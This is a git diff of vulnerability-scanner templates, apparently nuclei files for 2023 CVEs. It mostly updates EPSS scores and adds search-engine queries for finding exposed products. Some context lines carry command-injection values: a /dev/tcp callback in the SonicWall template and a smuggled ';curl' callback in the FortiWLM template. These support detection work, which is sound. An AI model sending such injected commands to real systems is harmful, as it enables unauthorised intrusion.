epss-score: 0.03433 + epss-percentile: 0.91476 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: sonicwall product: analytics shodan-query: http.favicon.hash:-1381126564 + fofa-query: icon_hash=-1381126564 tags: cve2023,cve,sonicwall,shell,injection,auth-bypass,instrusive variables: callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 339c29a255..b7e9c7e166 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2023-34259 cwe-id: CWE-22 - epss-score: 0.00554 - epss-percentile: 0.77111 + epss-score: 0.00559 + epss-percentile: 0.77589 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: kyocera product: d-copia253mf_plus_firmware shodan-query: http.favicon.hash:-50306417 + fofa-query: icon_hash=-50306417 tags: cve,cve2023,packetstorm,seclists,kyocera,lfi,printer http: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 19d090b842..406fc7064e 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34362 cwe-id: CWE-89 - epss-score: 0.95418 - epss-percentile: 0.99231 + epss-score: 0.95916 + epss-percentile: 0.99457 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_cloud shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index e7dcc114c3..8f929d6583 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -13,19 +13,24 @@ info: reference: - https://github.com/leekenghwa/CVE-2023-34537---XSS-reflected--found-in-HotelDruid-3.0.5 - https://nvd.nist.gov/vuln/detail/CVE-2023-34537 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2023-34537 cwe-id: CWE-79 - epss-score: 0.0007 - epss-percentile: 0.28902 + epss-score: 0.00084 + epss-percentile: 0.35673 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: digitaldruid product: hoteldruid + shodan-query: http.title:"hoteldruid" + fofa-query: title="hoteldruid" + google-query: intitle:"hoteldruid" tags: cve2023,cve,hoteldrui,xss,authenticated,digitaldruid http: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 72cedccfb6..63628bf4ec 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34598 cwe-id: CWE-22 - epss-score: 0.03342 - epss-percentile: 0.9114 + epss-score: 0.02842 + epss-percentile: 0.90694 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index dfabd8690a..a54eff2245 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -13,19 +13,23 @@ info: reference: - https://github.com/maddsec/CVE-2023-34599 - https://vulmon.com/searchpage?q=CVE-2023-34599 + - https://github.com/Imahian/CVE-2023-34599 + - https://github.com/hheeyywweellccoommee/CVE-2023-34599-xsddo + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29205 + epss-percentile: 0.30482 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 vendor: gibbonedu product: gibbon shodan-query: http.favicon.hash:-165631681 + fofa-query: icon_hash="-165631681" tags: cve2023,cve,gibbon,xss,authenticated,intrusive,gibbonedu http: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 13662666d8..9d5d784e8e 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 - epss-score: 0.08148 - epss-percentile: 0.93712 + epss-score: 0.06326 + epss-percentile: 0.93621 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: ultimatemember product: ultimate_member framework: wordpress + shodan-query: http.html:/wp-content/plugins/ultimate-member + fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 867bbb630c..d86ab04fb3 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -19,14 +19,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34659 cwe-id: CWE-89 - epss-score: 0.21629 - epss-percentile: 0.96326 + epss-score: 0.40226 + epss-percentile: 0.97268 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeecg product: jeecg_boot shodan-query: http.favicon.hash:1380908726 + fofa-query: icon_hash=1380908726 tags: cve2023,cve,jeecg,sqli http: diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 9edc4bae5e..55e4298a76 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34751 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 8eee0e5231..2f1236d64e 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34752 cwe-id: CWE-89 - epss-score: 0.0945 - epss-percentile: 0.9459 + epss-score: 0.14896 + epss-percentile: 0.95799 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 6d1d4d166c..3d933c4083 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34753 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index a92f5f1025..85c0786203 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34755 cwe-id: CWE-89 - epss-score: 0.01254 - epss-percentile: 0.84129 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index b5bebab94f..975dbb1e81 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34756 cwe-id: CWE-89 - epss-score: 0.02354 - epss-percentile: 0.89556 + epss-score: 0.0257 + epss-percentile: 0.90221 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 365467b10d..f84ce59c9e 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.28961 + epss-percentile: 0.30234 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: hestiacp product: control_panel shodan-query: http.favicon.hash:-476299640 + fofa-query: title="hestia control panel" + google-query: intitle:"hestia control panel" tags: cve2023,cve,huntr,hestiacp,xss,intrusive http: diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 668506d369..2dab5b6922 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-34843 cwe-id: CWE-22 - epss-score: 0.00349 - epss-percentile: 0.71237 + epss-score: 0.00357 + epss-percentile: 0.72064 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: traggo product: traggo shodan-query: html:"traggo" + fofa-query: body="traggo" tags: cve2023,cve,traggo,lfi,server http: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 5b92ad6570..a0c18ba776 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-34960 cwe-id: CWE-77 - epss-score: 0.93541 - epss-percentile: 0.99046 + epss-score: 0.93314 + epss-percentile: 0.99067 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 3016937624..6b24fab5c1 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -16,13 +16,22 @@ info: reference: - https://fortiguard.com/psirt/FG-IR-23-140 - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34993 + cwe-id: CWE-78 + epss-score: 0.96644 + epss-percentile: 0.99631 + cpe: cpe:2.3:a:fortinet:fortiwlm:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortiwlm shodan-query: http.title:"FortiWLM" + fofa-query: body="fortiwlm" + google-query: intitle:"fortiwlm" tags: cve,cve2023,fortinet,fortiwlm,rce,unauth - variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 17a14dd29e..4ca1beb09a 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.94864 - epss-percentile: 0.99112 + epss-score: 0.96825 + epss-percentile: 0.99689 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 7851495228..c7e16c73e4 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -13,13 +13,15 @@ info: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35082 - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US + - https://github.com/Chocapikk/CVE-2023-35082 + - https://github.com/Ostorlab/KEV classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-35082 cwe-id: CWE-287 - epss-score: 0.07991 - epss-percentile: 0.93656 + epss-score: 0.96732 + epss-percentile: 0.9966 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: product: endpoint_manager_mobile shodan-query: http.favicon.hash:362091310 fofa-query: icon_hash="362091310" - tags: cve2023,cve,ivanti,mobileiron,epmm + tags: cve2023,cve,ivanti,mobileiron,epmm,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35158.yaml b/http/cves/2023/CVE-2023-35158.yaml index cec2140f85..6ddc352321 100644 --- a/http/cves/2023/CVE-2023-35158.yaml +++ b/http/cves/2023/CVE-2023-35158.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-35158 cwe-id: CWE-87 - epss-score: 0.00105 - epss-percentile: 0.42103 + epss-score: 0.62633 + epss-percentile: 0.97829 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: xwiki product: xwiki shodan-query: "XWiki" + fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss http: diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 4f3d631987..42ae14df18 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -17,14 +17,16 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 - epss-score: 0.72023 - epss-percentile: 0.97805 + epss-score: 0.8819 + epss-percentile: 0.98674 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sitecore product: experience_commerce shodan-query: title:"Sitecore" + fofa-query: title="sitecore" + google-query: intitle:"sitecore" tags: cve2023,cve,sitecore,rce variables: string: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index f3ed2f48c3..f2adc64f35 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-35843 cwe-id: CWE-22 - epss-score: 0.03299 - epss-percentile: 0.91091 + epss-score: 0.06332 + epss-percentile: 0.93628 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: nocodb product: nocodb shodan-query: http.favicon.hash:-2017596142 + fofa-query: icon_hash=-2017596142 tags: cve2023,cve,nocodb,lfi http: diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 76e5b32c83..c21afb2f8a 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -33,6 +33,8 @@ info: vendor: lightdash product: lightdash shodan-query: title:"Lightdash" + fofa-query: title="lightdash" + google-query: intitle:"lightdash" tags: cve,cve2023,lightdash,lfi http: diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 3cab287c26..0c7a1c2d1c 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 - epss-score: 0.02964 - epss-percentile: 0.89873 + epss-score: 0.48073 + epss-percentile: 0.97467 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,8 +30,9 @@ info: vendor: mgt-commerce product: cloudpanel shodan-query: title:"Cloudpanel" + fofa-query: icon_hash="151132309" + google-query: intitle:"cloudpanel" tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload - variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index d5812e686c..5c1031bc35 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -18,14 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36144 cwe-id: CWE-862 - epss-score: 0.02858 - epss-percentile: 0.90492 + epss-score: 0.03179 + epss-percentile: 0.91154 cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: sg_2404_mr_firmware shodan-query: title:"Intelbras" + fofa-query: title="intelbras" + google-query: intitle:"intelbras" tags: cve2023,cve,intelbras,switch,exposure http: diff --git a/http/cves/2023/CVE-2023-36284.yaml b/http/cves/2023/CVE-2023-36284.yaml index dacbb3caae..6b42a00699 100644 --- a/http/cves/2023/CVE-2023-36284.yaml +++ b/http/cves/2023/CVE-2023-36284.yaml @@ -18,17 +18,16 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36284 cwe-id: CWE-89 - epss-score: 0.00061 - epss-percentile: 0.24798 + epss-score: 0.00721 + epss-percentile: 0.80577 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: webkul product: qloapps fofa-query: title="QloApps" tags: cve,cve2023,qloapps,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 51933089f6..88c763a994 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36287 cwe-id: CWE-79 - epss-score: 0.00075 - epss-percentile: 0.30832 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul http: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 0e918eae9a..6b7c59e0d6 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -19,14 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36289 cwe-id: CWE-79 - epss-score: 0.00083 - epss-percentile: 0.33945 + epss-score: 0.0009 + epss-percentile: 0.38405 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: webkul product: qloapps + fofa-query: title="qloapps" tags: cve2023,cve,xss,webkul-qloapps,unauth,webkul variables: email: "{{randstr}}@{{rand_base(5)}}.com" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index e917ea324e..bea9bcc4eb 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-36306 cwe-id: CWE-79 epss-score: 0.00385 - epss-percentile: 0.70371 + epss-percentile: 0.73054 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 28b2667599..214d4132e9 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36346 cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39295 + epss-score: 0.00107 + epss-percentile: 0.43313 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 7e0206581a..1d4c47d875 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-36347 cwe-id: CWE-306 - epss-score: 0.00103 - epss-percentile: 0.41216 + epss-score: 0.01502 + epss-percentile: 0.86929 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: vendor: codekop diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index a792bc8dd0..aba9b02418 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -21,14 +21,14 @@ info: cvss-score: 5.3 cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.03926 - epss-percentile: 0.91134 - cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + epss-score: 0.74086 + epss-percentile: 0.98118 + cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: juniper - product: junos + product: srx100 shodan-query: title:"Juniper Web Device Manager" tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev variables: diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index a8800a4134..8e87afd17d 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-36845 cwe-id: CWE-473 - epss-score: 0.69312 - epss-percentile: 0.97711 + epss-score: 0.96663 + epss-percentile: 0.99636 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" + fofa-query: title="juniper web device manager" + google-query: intitle:"juniper web device manager" tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev http: diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index c6493bc628..e119981f5c 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.09049 - epss-percentile: 0.94466 + epss-score: 0.15264 + epss-percentile: 0.95843 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: progress product: moveit_transfer shodan-query: http.favicon.hash:989289239 + fofa-query: icon_hash=989289239 tags: cve,cve2023,moveit,rce,sqli,intrusive,progress variables: session_cookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 3ade203f7f..5014790749 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-3710 cwe-id: CWE-77,CWE-20 - epss-score: 0.75328 - epss-percentile: 0.97883 + epss-score: 0.70969 + epss-percentile: 0.98042 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: honeywell product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" + fofa-query: body="/main/login.lua?pageid=" tags: cve2023,cve,honeywell,pm43,printer,iot,rce http: diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 23a94dbbbc..716d33643d 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.14233 - epss-percentile: 0.95569 + epss-score: 0.04239 + epss-percentile: 0.92256 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index f601503116..a622aebde7 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.07286 - epss-percentile: 0.93418 + epss-score: 0.03237 + epss-percentile: 0.91226 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 267e10b816..c33d1b1d78 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 - epss-score: 0.01621 - epss-percentile: 0.86175 + epss-score: 0.02538 + epss-percentile: 0.90171 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: piwigo product: piwigo shodan-query: http.favicon.hash:540706145 + fofa-query: icon_hash=540706145 + google-query: powered by piwigo tags: cve2023,cve,piwigo,sqli,authenticated http: diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 0cb459af4b..008c25c278 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -13,13 +13,14 @@ info: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg - https://jira.xwiki.org/browse/XWIKI-20457 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-37462 cwe-id: CWE-74 - epss-score: 0.42489 - epss-percentile: 0.96989 + epss-score: 0.56128 + epss-percentile: 0.97681 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 1c2f14d4ef..75a21edba1 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -17,14 +17,17 @@ info: cvss-score: 7.5 cve-id: CVE-2023-37474 cwe-id: CWE-22 - epss-score: 0.04155 - epss-percentile: 0.91315 + epss-score: 0.05882 + epss-percentile: 0.93414 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: copyparty_project product: copyparty + shodan-query: http.title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,traversal,copyparty,copyparty_project http: diff --git a/http/cves/2023/CVE-2023-37580.yaml 